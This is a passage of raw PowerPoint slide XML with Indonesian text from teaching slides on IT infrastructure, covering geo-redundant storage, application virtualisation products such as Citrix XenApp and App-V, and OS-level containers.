              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hancur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> offline.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Geo-redundant storage (GRS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> regional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169592186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Virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontainer</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VDI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alih-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform virtual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Citrix XenApp (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>MetaFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Presentation Server), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> App-V </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows Server dan VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ThinApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTML5, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Kontainerisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ide hypervisor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gantinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemisahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CPU dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kernel OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
